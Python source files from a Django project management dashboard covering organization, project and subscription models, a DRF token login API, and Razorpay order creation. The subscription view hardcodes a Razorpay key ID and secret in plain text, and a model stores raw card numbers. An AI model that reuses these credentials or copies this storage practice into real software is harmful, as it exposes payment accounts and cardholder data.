tf.train.GradientDescentOptimizer(learning_rate=learning_rate).minimize(cost)\r\n\r\n## Session\r\n# 初始化变量\r\ninit = tf.global_variables_initializer()\r\n\r\n# 启动图\r\nwith tf.Session() as sess:\r\n sess.run(init)\r\n # 训练循环\r\n for epoch in range(training_epochs):\r\n total_batch = int(mnist.train.num_examples/batch_size)\r\n # 遍历所有batch\r\n for i in range(total_batch):\r\n batch_x,batch_y = mnist.train.next_batch(batch_size)\r\n # 运行优化器进行反向传播,计算cost(获取loss值)\r\n sess.run(optimizer,feed_dict={x:batch_x,y:batch_y})\r\n # 显示每步的logs\r\n if epoch % display_step == 0:\r\n c = sess.run(cost,feed_dict={x:batch_x,y:batch_y})\r\n print(\"Epoch:\",'%04d' % (epoch + 1),\"cost=\",\"{:.9f}\".format(c))\r\n print(\"Optimization Finished!\")\r\n\r\n # 测试模型\r\n correct_prediction = tf.equal(tf.argmax(logits,1),tf.argmax(y,1))\r\n # 计算准确率\r\n accuracy = tf.reduce_mean(tf.cast(correct_prediction,\"float\"))\r\n # 如果没有足够的内存可以适当减少test_size\r\n test_size = 256\r\n print(\"Accuracy:\",accuracy.eval({x:mnist.test.images[:test_size],y:mnist.test.labels[:test_size]}))\r\n\r\n# Optimization Finished!\r\n# Accuracy: 0.78515625" }, { "alpha_fraction": 0.7138643264770508, "alphanum_fraction": 0.7404129505157471, "avg_line_length": 32, "blob_id": "bcec6c86bca4928fae9c1357d6f4a59c9e751f35", "content_id": "ce048b3004f2abf90205290fb47e248dafc451fc", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 678, "license_type": "no_license", "max_line_length": 71, "num_lines": 20, "path": "/TensorFlow/Mini-batch/w_b_MNIST.py", "repo_name": "ML-ZimingMeng/Study-Notes", "src_encoding": "UTF-8", "text": "from tensorflow.examples.tutorials.mnist import input_data\r\nimport tensorflow as tf\r\nimport numpy as np\r\n\r\nn_input = 784 # MNIST data input(img shape:28*28)\r\nn_classes = 10 # MNIST total classes (0-9 digits)\r\n\r\n# Import MNIST data\r\nmnist = input_data.read_data_sets('/datasets/ud730/mnist',one_hot=True)\r\n\r\n# The features are already scaled and the data is shuffled\r\ntrain_features = mnist.train.images\r\ntest_features = mnist.test.images\r\n\r\ntrain_labels = mnist.train.labels.astype(np.float32)\r\ntest_labels = mnist.test.labels.astype(np.float32)\r\n\r\n# Weights & bias\r\nweights = tf.Variable(tf.random_normal([n_input,n_classes]))\r\nbias = tf.Variable(tf.random_normal([n_classes]))" }, { "alpha_fraction": 0.6750503182411194, "alphanum_fraction": 0.6851106882095337, "avg_line_length": 22.899999618530273, "blob_id": "cf1854b9bc3beceb3559c35c74efd49ca12a01a6", "content_id": "67b7b7980fca1568d3f04888edd260c9ab78e20e", "detected_licenses": [], 
"is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1206, "license_type": "no_license", "max_line_length": 80, "num_lines": 40, "path": "/TensorFlow/tf_modify_model.py", "repo_name": "ML-ZimingMeng/Study-Notes", "src_encoding": "UTF-8", "text": "import tensorflow as tf\r\n\r\n# 移除先前的权重和偏置项\r\ntf.reset_default_graph()\r\n\r\nsave_file = './train_model.ckpt'\r\n\r\n# 两个Tensor变量:权重和偏置项\r\n# 把保存的变量直接加载到已经修改过的模型会产生错误\r\nweights = tf.Variable(tf.truncated_normal([2,3]),name='weights_0') # 手动设置name属性\r\nbias = tf.Variable(tf.truncated_normal([3]),name='bias_0')\r\n\r\nsaver = tf.train.Saver()\r\n\r\n# 打印权重和偏置项的名字\r\nprint('Save Weights:{}'.format(weights.name))\r\nprint('Save Bias:{}'.format(bias.name))\r\n\r\nwith tf.Session() as sess:\r\n sess.run(tf.global_variables_initializer())\r\n saver.save(sess,save_file)\r\n\r\n# 移除之前的权重和偏置项\r\ntf.reset_default_graph()\r\n\r\n# 两个变量:权重和偏置项\r\nbias = tf.Variable(tf.truncated_normal([3]),name='bias_0')\r\nweights = tf.Variable(tf.truncated_normal([2,3]),name='weights_0')\r\n\r\nsaver = tf.train.Saver()\r\n\r\n# 打印权重和偏置项的名字\r\nprint('Load Weights:{}'.format(weights.name))\r\nprint('Load Bias:{}'.format(bias.name))\r\n\r\nwith tf.Session() as sess:\r\n # 加载权重和偏置项-报错\r\n saver.restore(sess,save_file)\r\n\r\nprint('Loaded Weights and Bias successfully.')" }, { "alpha_fraction": 0.6607595086097717, "alphanum_fraction": 0.701265811920166, "avg_line_length": 28.538461685180664, "blob_id": "7a6b1519825b9c195d4c21abdd3f6c8385fab527", "content_id": "a025ae625711194ce0fc34f24f435385ad0d69de", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 405, "license_type": "no_license", "max_line_length": 88, "num_lines": 13, "path": "/TensorFlow/tf_Cross Entropy.py", "repo_name": "ML-ZimingMeng/Study-Notes", "src_encoding": "UTF-8", "text": "import tensorflow as tf\r\n\r\nsoftmax_data = [0.7,0.2,0.1]\r\none_hot_data = [1.0,0.0,0.0]\r\n\r\nsoftmax = tf.placeholder(tf.float32)\r\none_hot = tf.placeholder(tf.float32)\r\n\r\n# Print cross entropy(交叉熵)from session\r\ncross_entropy = -tf.reduce_sum(tf.multiply(one_hot,tf.log(softmax)))\r\n\r\nwith tf.Session() as sess:\r\n print(sess.run(cross_entropy,feed_dict={softmax:softmax_data,one_hot:one_hot_data}))" }, { "alpha_fraction": 0.6495277881622314, "alphanum_fraction": 0.6820566654205322, "avg_line_length": 21.875, "blob_id": "5738ef65cd80804f441b995e905d55cbb8a07dd1", "content_id": "d9a62e5ee33953e56ab39a8abd9aa890a5464003", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 979, "license_type": "no_license", "max_line_length": 77, "num_lines": 40, "path": "/Keras/network.py", "repo_name": "ML-ZimingMeng/Study-Notes", "src_encoding": "UTF-8", "text": "import numpy as np\r\nfrom keras.utils import np_utils\r\nimport tensorflow as tf\r\ntf.python_io = tf\r\n\r\n# Set random seed\r\nnp.random.seed(42)\r\n\r\n# Our data\r\nX = np.array([[0,0],[0,1],[1,0],[1,1]]).astype('float32')\r\ny = np.array([[0],[1],[1],[0]]).astype('float32')\r\n\r\n# Initial Setup for Keras\r\nfrom keras.models import Sequential\r\nfrom keras.layers.core import Dense,Activation\r\n# One-hot encoding the output\r\ny = np_utils.to_categorical(y)\r\n\r\n# Building the model\r\nxor = Sequential()\r\n\r\n# Add required layers\r\nxor.add(Dense(64,input_dim=2))\r\nxor.add(Activation('relu')) # 
relu似乎很有用,可使准确率达到100%\r\nxor.add(Dense(8))\r\nxor.add(Activation('relu'))\r\nxor.add(Dense(2))\r\nxor.add(Activation('softmax'))\r\n\r\nxor.compile(loss=\"binary_crossentropy\",optimizer=\"adam\",metrics=['accuracy'])\r\n\r\nxor.summary()\r\n\r\nhistory = xor.fit(X,y,epochs=100,verbose=0)\r\n\r\nscore = xor.evaluate(X,y)\r\nprint(\"\\nAccuracy:\",score[-1])\r\n\r\nprint(\"\\nPredictions:\")\r\nprint(xor.predict_proba(X))" }, { "alpha_fraction": 0.615877091884613, "alphanum_fraction": 0.6274007558822632, "avg_line_length": 21.342857360839844, "blob_id": "54f99ee20052040e57c4298167b1831c30985d78", "content_id": "ca00586680dd861c4b5f72c614188250e60d5cb1", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 805, "license_type": "no_license", "max_line_length": 77, "num_lines": 35, "path": "/Data Structures-Algorithms/P0/Task1.py", "repo_name": "ML-ZimingMeng/Study-Notes", "src_encoding": "UTF-8", "text": "\"\"\"\nRead file into texts and calls.\nIt's ok if you don't understand how to read files.\n\"\"\"\nimport csv\nwith open('texts.csv', 'r') as f:\n    reader = csv.reader(f)\n    texts = list(reader)\n\nwith open('calls.csv', 'r') as f:\n    reader = csv.reader(f)\n    calls = list(reader)\n\n# A single set counts each number once, even when it appears in both files\nnumbers = set()\nfor i in texts:\n    numbers.add(i[0].replace(\" \",\"\"))\n    numbers.add(i[1].replace(\" \",\"\"))\nfor j in calls:\n    numbers.add(j[0].replace(\" \",\"\"))\n    numbers.add(j[1].replace(\" \",\"\"))\n\nprint(\"There are {} different telephone numbers in the records.\".format(len(numbers)))\n\n\"\"\"\nTASK 1:\nHow many different telephone numbers are there in the records? \nPrint a message:\n\"There are <count> different telephone numbers in the records.\"\n\"\"\"\n# 时间复杂度:O(n)\n# 空间复杂度:O(n)" }, { "alpha_fraction": 0.6557919383049011, "alphanum_fraction": 0.6709219813346863, "avg_line_length": 27.375, "blob_id": "96476395ea589bca4d474c7d4094ed84df53742f", "content_id": "dc48f8d57a19264963f515a029406259b7bb681d", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2115, "license_type": "no_license", "max_line_length": 83, "num_lines": 72, "path": "/TensorFlow/Linear algebra/sandbox.py", "repo_name": "ML-ZimingMeng/Study-Notes", "src_encoding": "UTF-8", "text": "import tensorflow as tf\r\nfrom tensorflow.examples.tutorials.mnist import input_data\r\nfrom quiz import get_weights,get_biases,linear\r\n\r\ndef mnist_features_labels(n_labels):\r\n    \"\"\"\r\n    Gets the first <n> labels from the MNIST dataset\r\n    :param n_labels: Number of labels to use\r\n    :return: Tuple of feature list and label list\r\n    \"\"\"\r\n\r\n    mnist_features = []\r\n    mnist_labels = []\r\n\r\n    mnist = input_data.read_data_sets('/datasets/ud730/mnist',one_hot=True)\r\n\r\n    # In order to make quizzes run faster,we're only looking at 10000 images\r\n    for mnist_feature,mnist_label in zip(*mnist.train.next_batch(10000)):\r\n\r\n        # Add features and labels if it's for the first <n>th labels\r\n        if mnist_label[:n_labels].any():\r\n            mnist_features.append(mnist_feature)\r\n            mnist_labels.append(mnist_label[:n_labels])\r\n\r\n    return mnist_features,mnist_labels\r\n\r\n# Number of features (28*28 image is 784 features)\r\nn_features = 784\r\n# Number of labels\r\nn_labels = 3\r\n\r\n# Features and Labels\r\nfeatures = tf.placeholder(tf.float32)\r\nlabels = tf.placeholder(tf.float32)\r\n\r\n# Weights and Biases\r\nW = get_weights(n_features,n_labels)\r\nb = get_biases(n_labels)\r\n\r\n# Linear Function xW + 
b\r\nlogits = linear(features,W,b)\r\n\r\n# Training data\r\ntrain_features,train_labels = mnist_features_labels(n_labels)\r\n\r\nwith tf.Session() as session:\r\n session.run(tf.global_variables_initializer())\r\n\r\n prediction = tf.nn.softmax(logits)\r\n\r\n # Cross entropy\r\n # This quantifies how far off the predictions were.\r\n cross_entropy = -tf.reduce_sum(labels * tf.log(prediction),reduction_indices=1)\r\n\r\n # Training loss\r\n loss = tf.reduce_mean(cross_entropy)\r\n\r\n # Rate at which the weights are changed\r\n learning_rate = 0.08\r\n\r\n # GRADIENT Descent\r\n # This is the method used to train the model\r\n optimizer = tf.train.GradientDescentOptimizer(learning_rate).minimize(loss)\r\n\r\n # Run optimizer and get loss\r\n _, l = session.run(\r\n [optimizer,loss],\r\n feed_dict={features:train_features,labels:train_labels}\r\n )\r\n\r\n# Print loss\r\nprint('Loss:{}'.format(l))\r\n" }, { "alpha_fraction": 0.5943832993507385, "alphanum_fraction": 0.6062536239624023, "avg_line_length": 23.04347801208496, "blob_id": "c4369a2e018ab687941e5a88b9d2d3e736155c5d", "content_id": "c837dca73fb63434f0b0ad658f8e62737a5f242a", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3896, "license_type": "no_license", "max_line_length": 88, "num_lines": 138, "path": "/TensorFlow/save_load_w_b.py", "repo_name": "ML-ZimingMeng/Study-Notes", "src_encoding": "UTF-8", "text": "## Save the weights and bias Tensors with a simple example\r\nimport tensorflow as tf\r\n\r\n# File save path\r\nsave_file = './model.ckpt'\r\n\r\n# Two Tensor variables: weights and bias\r\nweights = tf.Variable(tf.truncated_normal([2,3]))\r\nbias = tf.Variable(tf.truncated_normal([3]))\r\n\r\n# Class used to save and restore Tensor variables\r\nsaver = tf.train.Saver()\r\n\r\nwith tf.Session() as sess:\r\n # Initialize all variables\r\n sess.run(tf.global_variables_initializer())\r\n\r\n # Show the weights and bias\r\n print('Weights:')\r\n print(sess.run(weights))\r\n print('Bias:')\r\n print(sess.run(bias))\r\n\r\n # Save the model\r\n saver.save(sess,save_file)\r\n\r\n# Remove the previous weights and bias\r\ntf.reset_default_graph()\r\n\r\n# Two variables: weights and bias\r\n# These two variables still have to be created\r\nweights = tf.Variable(tf.truncated_normal([2,3]))\r\nbias = tf.Variable(tf.truncated_normal([3]))\r\n\r\n# Class used to save and restore Tensor variables\r\nsaver = tf.train.Saver()\r\n\r\nwith tf.Session() as sess:\r\n # Load the weights and bias\r\n saver.restore(sess,save_file) # the tf.train.Saver.restore() function\r\n # loads the previously saved data into weights and bias.\r\n\r\n # Show the weights and bias\r\n print('Weights:')\r\n print(sess.run(weights))\r\n print('Bias:')\r\n print(sess.run(bias))\r\n\r\n# Remove the previous Tensors and operations\r\ntf.reset_default_graph()\r\n\r\nfrom tensorflow.examples.tutorials.mnist import input_data\r\nimport numpy as np\r\n\r\nlearning_rate = 0.001\r\nn_input = 784 # MNIST data input (image size: 28*28)\r\nn_classes = 10 # total MNIST classes (digits 0-9)\r\n\r\n# Load MNIST data\r\nmnist = input_data.read_data_sets('.',one_hot=True)\r\n\r\n# Features and labels\r\nfeatures = tf.placeholder(tf.float32,[None,n_input])\r\nlabels = tf.placeholder(tf.float32,[None,n_classes])\r\n\r\n# Weights and bias\r\nweights = tf.Variable(tf.random_normal([n_input,n_classes]))\r\nbias = tf.Variable(tf.random_normal([n_classes]))\r\n\r\n# Logits - xW + b\r\nlogits = tf.add(tf.matmul(features,weights),bias)\r\n\r\n# Define the loss function and optimizer\r\ncost = tf.reduce_mean(\r\n tf.nn.softmax_cross_entropy_with_logits(logits=logits,labels=labels)\r\n)\r\noptimizer = tf.train.GradientDescentOptimizer(learning_rate=learning_rate).minimize(cost)\r\n\r\n# Compute accuracy\r\ncorrect_prediction = tf.equal(tf.argmax(logits,1),tf.argmax(labels,1))\r\naccuracy = tf.reduce_mean(tf.cast(correct_prediction,tf.float32))\r\n\r\n# Train the model and save the weights\r\nimport 
math\r\n\r\nsave_file = './train_model.ckpt'\r\nbatch_size = 128\r\nn_epochs = 100\r\n\r\nsaver = tf.train.Saver()\r\n\r\n# Launch the graph\r\nwith tf.Session() as sess:\r\n sess.run(tf.global_variables_initializer())\r\n\r\n # Training loop\r\n for epoch in range(n_epochs):\r\n total_batch = math.ceil(mnist.train.num_examples / batch_size)\r\n\r\n # Loop over all batches\r\n for i in range(total_batch):\r\n batch_features,batch_labels = mnist.train.next_batch(batch_size)\r\n sess.run(\r\n optimizer,\r\n feed_dict={features:batch_features,labels:batch_labels}\r\n )\r\n\r\n # Print status every 10 epochs\r\n if epoch % 10 == 0:\r\n valid_accuracy = sess.run(\r\n accuracy,\r\n feed_dict={\r\n features:mnist.validation.images,\r\n labels:mnist.validation.labels\r\n }\r\n )\r\n print('Epoch{:<3} - Validation Accuracy:{}'.format(\r\n epoch,\r\n valid_accuracy\r\n ))\r\n\r\n # Save the model\r\n saver.save(sess,save_file)\r\n print('Trained Model Saved.')\r\n\r\nsaver = tf.train.Saver()\r\n\r\n# Load the graph\r\nwith tf.Session() as sess:\r\n saver.restore(sess,save_file)\r\n\r\n test_accuracy = sess.run(\r\n accuracy,\r\n feed_dict={\r\n features:mnist.test.images,labels:mnist.test.labels\r\n }\r\n )\r\nprint('Test Accuracy:{}'.format(test_accuracy))" }, { "alpha_fraction": 0.7052767276763916, "alphanum_fraction": 0.7271557450294495, "avg_line_length": 19.52777862548828, "blob_id": "1598cd4c6907d1aee080ba0bfdd68f2c11a5665d", "content_id": "9aa3964e4509f9b994291ddac0c0dd5e3bb5005a", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1059, "license_type": "no_license", "max_line_length": 84, "num_lines": 36, "path": "/Keras/Keras_structure.py", "repo_name": "ML-ZimingMeng/Study-Notes", "src_encoding": "UTF-8", "text": "### The following is an overview of Keras models; this program is not meant to be run\r\n## Sequential model\r\nfrom keras.models import Sequential\r\n\r\n# Create the Sequential model\r\n# The keras.models.Sequential class is a wrapper container for neural network models.\r\n# It provides common functions such as fit(), evaluate() and compile()\r\nmodel = Sequential()\r\n\r\n## Layers\r\n# Keras layers work like neural network layers. There are fully connected, max pooling and activation layers.\r\n# Layers can be added with the add() function.\r\nfrom keras.models import Sequential\r\nfrom keras.layers.core import Dense,Activation,Flatten\r\n\r\n# Create the Sequential model\r\nmodel = Sequential()\r\n\r\n# First layer - add a fully connected layer with 128 nodes and an input layer with 32 nodes\r\nmodel.add(Dense(128,input_dim=32))\r\n\r\n# Second layer - add a softmax activation layer\r\nmodel.add(Activation('softmax'))\r\n\r\n# Third layer - add a fully connected layer\r\nmodel.add(Dense(10))\r\n\r\n# Fourth layer - add a sigmoid activation layer\r\nmodel.add(Activation('sigmoid'))\r\n\r\n# Compile the model\r\nmodel.compile(loss=\"categorical_crossentropy\",optimizer=\"adam\",metrics=['accuracy'])\r\n\r\nmodel.fit(X,y,epochs=1000,verbose=0)\r\n\r\nmodel.evaluate()\r\n\r\n" } ]
16
prinjal-boruah/new_me
https://github.com/prinjal-boruah/new_me
eab9aed04dadd4885e04a8d7614a3b9c158b3b6f
910d3e88be7ae48d51735bcb353e936b40dd0df6
362ac1757d81606b8cd1a036423c2f9a86cd81ca
refs/heads/master
2022-07-03T11:47:01.629064
2020-05-16T07:08:39
2020-05-16T07:08:39
264,379,820
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.6817406415939331, "alphanum_fraction": 0.703071653842926, "avg_line_length": 36.20634841918945, "blob_id": "71cbfb15cdaa5e62eb2a22740ed915f3e9009eef", "content_id": "81875a736eb92b9fb864193095e8d135c728a45b", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2344, "license_type": "permissive", "max_line_length": 110, "num_lines": 63, "path": "/django-dashboard-atlantis-dark/platform_app/models.py", "repo_name": "prinjal-boruah/new_me", "src_encoding": "UTF-8", "text": "from django.db import models\nfrom django.contrib.auth.models import User\n\n\nclass Organization(models.Model):\n user = models.OneToOneField(User, on_delete = models.CASCADE)\n org_name = models.CharField(max_length=150)\n comm_address1 = models.TextField()\n comm_address2 = models.TextField()\n comm_country = models.CharField(max_length=150)\n comm_state = models.CharField(max_length=150)\n comm_city = models.CharField(max_length=150)\n comm_phone = models.BigIntegerField()\n comm_email = models.EmailField()\n comm_gstin = models.CharField(max_length=150)\n bill_address1 = models.TextField()\n bill_address2 = models.TextField()\n bill_country = models.CharField(max_length=150)\n bill_state = models.CharField(max_length=150)\n bill_city = models.CharField(max_length=150)\n bill_phone = models.BigIntegerField()\n bill_email = models.EmailField()\n bill_gstin = models.CharField(max_length=150)\n\n def __str__(self):\n return str(self.org_name)\n\n\nclass SubscriptionPlan(models.Model):\n plan = models.CharField(max_length=150)\n description = models.TextField()\n number_of_stakeholders = models.IntegerField()\n price = models.BigIntegerField()\n created = models.DateTimeField()\n validity = models.IntegerField()\n\n def __str__(self):\n return str(self.plan)\n\n\nclass Project(models.Model):\n organization = models.ForeignKey(Organization, on_delete = models.CASCADE)\n user = models.ForeignKey(User, on_delete = models.CASCADE, blank = True, null = True)\n title = models.CharField(max_length=150)\n description = models.TextField()\n start_date = models.CharField(max_length=200)\n end_date = models.CharField(max_length=200)\n duration = models.IntegerField(blank = True, null = True)\n subscribed_plan = models.ForeignKey(SubscriptionPlan, on_delete=models.PROTECT, blank = True, null = True)\n razorpay_order_id = models.CharField(max_length = 100, null=True, blank= True)\n\n def __str__(self):\n return str(self.title)\n\n\nclass Card(models.Model):\n organization = models.ForeignKey(Organization, on_delete = models.CASCADE)\n card_number = models.BigIntegerField()\n name_on_card = models.CharField(max_length = 100)\n expiry_date = models.CharField(max_length=4)\n \n def __str__(self):\n return str(self.organization)\n" }, { "alpha_fraction": 0.7052631378173828, "alphanum_fraction": 0.7052631378173828, "avg_line_length": 20.16666603088379, "blob_id": "8ab2bd5e1370e2bb15b5e8c9cf7e3f9e1b22aea1", "content_id": "b3afe031e926dfa7a1eb8c1d14932b79d6feab9f", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 380, "license_type": "permissive", "max_line_length": 53, "num_lines": 18, "path": "/django-dashboard-atlantis-dark/api_app/serializers.py", "repo_name": "prinjal-boruah/new_me", "src_encoding": "UTF-8", "text": "from rest_framework import serializers\nfrom django.contrib.auth.models import User\nfrom platform_app.models import Project\n\n\nclass 
UserSerializer(serializers.ModelSerializer):\n\n class Meta:\n model = User\n fields = ('username', 'password')\n\n\n\nclass ProjectSerializer(serializers.ModelSerializer):\n\n class Meta:\n model = Project\n fields = '__all__'" }, { "alpha_fraction": 0.6660899519920349, "alphanum_fraction": 0.6678200960159302, "avg_line_length": 40.35714340209961, "blob_id": "47746e9316e01e3538fe2d2510f24e0d6940bd69", "content_id": "c97feef05ba7c8a3a5b4094887907ad35fb5bd86", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 578, "license_type": "permissive", "max_line_length": 77, "num_lines": 14, "path": "/django-dashboard-atlantis-dark/platform_app/urls.py", "repo_name": "prinjal-boruah/new_me", "src_encoding": "UTF-8", "text": "from django.urls import path\nfrom . import views\n\nurlpatterns = [\n path('', views.projects, name='projects1'),\n path('projects', views.projects, name='projects'),\n path('create_project', views.create_project, name='create_project'),\n path('addcard/', views.addCard, name='addcard'),\n path('create_org', views.CreateOrg.as_view({'get': 'list'})),\n path('create_proj', views.CreateProj.as_view({'get': 'list'})),\n path('subscribe/<int:pk>', views.ProjectSubscription.as_view()),\n\n path('postdetails/<int:pk>/', views.postMEdetails, name = \"postdetails\"),\n]" }, { "alpha_fraction": 0.7133973836898804, "alphanum_fraction": 0.7269644141197205, "avg_line_length": 33.686275482177734, "blob_id": "9f359638b94f4004b5bf98089095208c54ac851e", "content_id": "e669c00d5dff813661d1a51c1402b6422d494375", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1769, "license_type": "permissive", "max_line_length": 108, "num_lines": 51, "path": "/django-dashboard-atlantis-dark/api_app/views.py", "repo_name": "prinjal-boruah/new_me", "src_encoding": "UTF-8", "text": "from django.shortcuts import render\nfrom django.views.decorators.csrf import csrf_exempt\nfrom rest_framework.decorators import api_view, permission_classes\nfrom rest_framework.status import (\n HTTP_400_BAD_REQUEST,\n HTTP_404_NOT_FOUND,\n HTTP_200_OK\n)\nfrom django.http import Http404\nfrom django.contrib.auth import authenticate\nfrom rest_framework.authtoken.models import Token\nfrom rest_framework.response import Response\nfrom rest_framework.permissions import AllowAny\nfrom django.contrib.auth.models import User\nfrom .serializers import UserSerializer, ProjectSerializer\nfrom platform_app.models import Project\nfrom rest_framework.views import APIView\n\n\n@csrf_exempt\n@api_view([\"POST\"])\n@permission_classes((AllowAny,))\ndef login_user(request):\n username = request.data.get(\"username\")\n password = request.data.get(\"password\")\n if username is None or password is None:\n return Response({'error': 'Please provide both username and password'}, status=HTTP_400_BAD_REQUEST)\n\n user = authenticate(username=username, password=password)\n\n if not user:\n return Response({'error': 'Invalid Credentials'}, status=HTTP_404_NOT_FOUND)\n\n token, _ = Token.objects.get_or_create(user=user)\n\n user = User.objects.get(username=user)\n \n return Response({'token': token.key, 'user': user.id, 'username': user.username}, status=HTTP_200_OK)\n\n\nclass ProjectsApiView(APIView):\n def get_object(self, pk):\n try:\n return Project.objects.filter(user=pk)\n except Project.DoesNotExist:\n raise Http404\n\n def get(self, request, pk):\n projects = self.get_object(pk)\n Projects = ProjectSerializer(projects, 
context={\"request\": request}, many=True)\n return Response(Projects.data)\n" }, { "alpha_fraction": 0.6931818127632141, "alphanum_fraction": 0.6931818127632141, "avg_line_length": 24.285715103149414, "blob_id": "1e5ff952e4720db42208a6994ea55f7e76b9aea2", "content_id": "275882b31f72200b78a18724dfd5b05ab5413839", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 176, "license_type": "permissive", "max_line_length": 67, "num_lines": 7, "path": "/django-dashboard-atlantis-dark/api_app/urls.py", "repo_name": "prinjal-boruah/new_me", "src_encoding": "UTF-8", "text": "from django.urls import path\nfrom . import views\n\nurlpatterns = [\n path('api/login', views.login_user),\n path('api/projects/<int:pk>', views.ProjectsApiView.as_view()),\n]" }, { "alpha_fraction": 0.6463870406150818, "alphanum_fraction": 0.6557309031486511, "avg_line_length": 33.407142639160156, "blob_id": "b82a6d821f9da97e6a2670392fc9166ce94d1a5e", "content_id": "78e426f9e9a57ca40d267e2fd97d805315d72bc5", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 4816, "license_type": "permissive", "max_line_length": 114, "num_lines": 140, "path": "/django-dashboard-atlantis-dark/platform_app/views.py", "repo_name": "prinjal-boruah/new_me", "src_encoding": "UTF-8", "text": "from django.contrib.auth.decorators import login_required\nfrom django.shortcuts import render, get_object_or_404, redirect\nfrom django.template import loader\nfrom django.http import HttpResponse\nfrom django import template\nfrom django.contrib.auth import authenticate, login\nfrom .models import *\nfrom django.forms.utils import ErrorList\n# from .forms import LoginForm, SignUpForm\nfrom datetime import datetime\n# import razorpay\n# import requests\nfrom rest_framework import viewsets, generics, status\nfrom .serializers import *\nfrom rest_framework.response import Response\nfrom rest_framework.status import (\n HTTP_400_BAD_REQUEST,\n HTTP_404_NOT_FOUND,\n HTTP_200_OK\n)\nfrom django.http import HttpResponse, Http404\nfrom rest_framework.views import APIView\nimport razorpay\nimport requests\n\nnow = datetime.now()\n\n@login_required(login_url=\"/login/\")\ndef projects(request):\n try:\n org = Organization.objects.get(user=request.user.id)\n proj = Project.objects.filter(organization=org.id)\n print(proj)\n proj_id_list = []\n for x in proj:\n proj_id_list.append(x.id)\n context = {\n # \"org\": Organization.objects.get(user=request.user.id),\n # \"subscriptions\": Subscription.objects.filter(project__in=proj_id_list),\n # \"project\": proj\n }\n return render(request, \"projects.html\", {\"project\": proj})\n except:\n print(\"Organization does not exist\")\n return render(request, \"projects.html\")\n\n\ndef create_project(request):\n print(Organization.objects.get(user = request.user))\n try:\n context = {\n \"org\" : Organization.objects.get(user = request.user),\n \"plans\": SubscriptionPlan.objects.all(),\n }\n except:\n return render(request, \"create_project.html\")\n return render(request, \"create_project.html\", context)\n\n\nclass CreateOrg(viewsets.ViewSet):\n def list(self, request):\n queryset = Organization.objects.all()\n serializer = OrganizationSerializer(queryset, many=True)\n return Response(serializer.data)\n\n def post(self, request):\n serializer = OrganizationSerializer(data=request.data)\n if serializer.is_valid():\n serializer.save()\n return Response(serializer.data, status=status.HTTP_201_CREATED)\n 
return Response(serializer.errors, status=status.HTTP_400_BAD_REQUEST)\n\nclass CreateProj(viewsets.ViewSet):\n def list(self, request):\n queryset = Project.objects.all()\n serializer = ProjectSerializer(queryset, many=True)\n return Response(serializer.data)\n\n def post(self, request):\n serializer = ProjectSerializer(data=request.data)\n if serializer.is_valid():\n serializer.save()\n return Response(serializer.data, status=status.HTTP_201_CREATED)\n return Response(serializer.errors, status=status.HTTP_400_BAD_REQUEST)\n\n\nclass ProjectSubscription(APIView):\n def get_object(self, pk):\n try:\n return Project.objects.get(pk=pk)\n except User.DoesNotExist:\n raise Http404\n\n def get(self, request, pk):\n project = self.get_object(pk)\n serializer = ProjectPlanSerializer(project)\n return Response(serializer.data)\n\n def put(self, request, pk, format=None):\n project = self.get_object(pk)\n new_dict = dict(request.data)\n sub_id = new_dict['subscribed_plan']\n sub_price = SubscriptionPlan.objects.get(id=int(sub_id[0])).price\n client=razorpay.Client(auth=(\"rzp_test_2tx97L0V09FUM6\",\"QOWTRaArqW2Gj8O6rUxtEVwR\"))\n Data = {'amount':str(int(sub_price)*100),\"currency\":'INR',\"receipt\":'order_rcptid_11',\"payment_capture\":1}\n val = client.order.create(data=Data)\n order_id = val['id']\n new_dict['razorpay_order_id'] = order_id\n new_dict.update({'subscribed_plan':int(sub_id[0])})\n serializer = ProjectPlanSerializer(project, data=new_dict)\n if serializer.is_valid():\n serializer.save()\n return Response(serializer.data)\n return Response(serializer.errors, status=status.HTTP_400_BAD_REQUEST)\n\ndef addCard(request):\n context = {\n \"sub\": Project.objects.last()\n }\n return render(request, \"card_deatils.html\",context)\n\ndef postMEdetails(request, pk):\n project_obj = Project.objects.get(id=pk)\n\n API_ENDPOINT = \"http://localhost:9000/register_user\"\n\n data = {'username': request.user.username,\n 'email':request.user.email,\n 'title':project_obj.title,\n 'summary': project_obj.description,\n 'start': project_obj.start_date,\n 'end': project_obj.end_date,\n 'status': \"New\" \n }\n\n r = requests.post(url = API_ENDPOINT, data = data)\n\n print(data)\n\n return redirect(\"projects\")" }, { "alpha_fraction": 0.522352933883667, "alphanum_fraction": 0.6023529171943665, "avg_line_length": 22.61111068725586, "blob_id": "39629008f8c183bc2cdbe8987f6a6e61e76a67b4", "content_id": "73481695fb9f8e0de08ef56c86ae33025d318de5", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 425, "license_type": "permissive", "max_line_length": 74, "num_lines": 18, "path": "/django-dashboard-atlantis-dark/platform_app/migrations/0005_project_razorpay_order_id.py", "repo_name": "prinjal-boruah/new_me", "src_encoding": "UTF-8", "text": "# Generated by Django 3.0.5 on 2020-05-16 04:46\n\nfrom django.db import migrations, models\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('platform_app', '0004_auto_20200516_0246'),\n ]\n\n operations = [\n migrations.AddField(\n model_name='project',\n name='razorpay_order_id',\n field=models.CharField(blank=True, max_length=100, null=True),\n ),\n ]\n" }, { 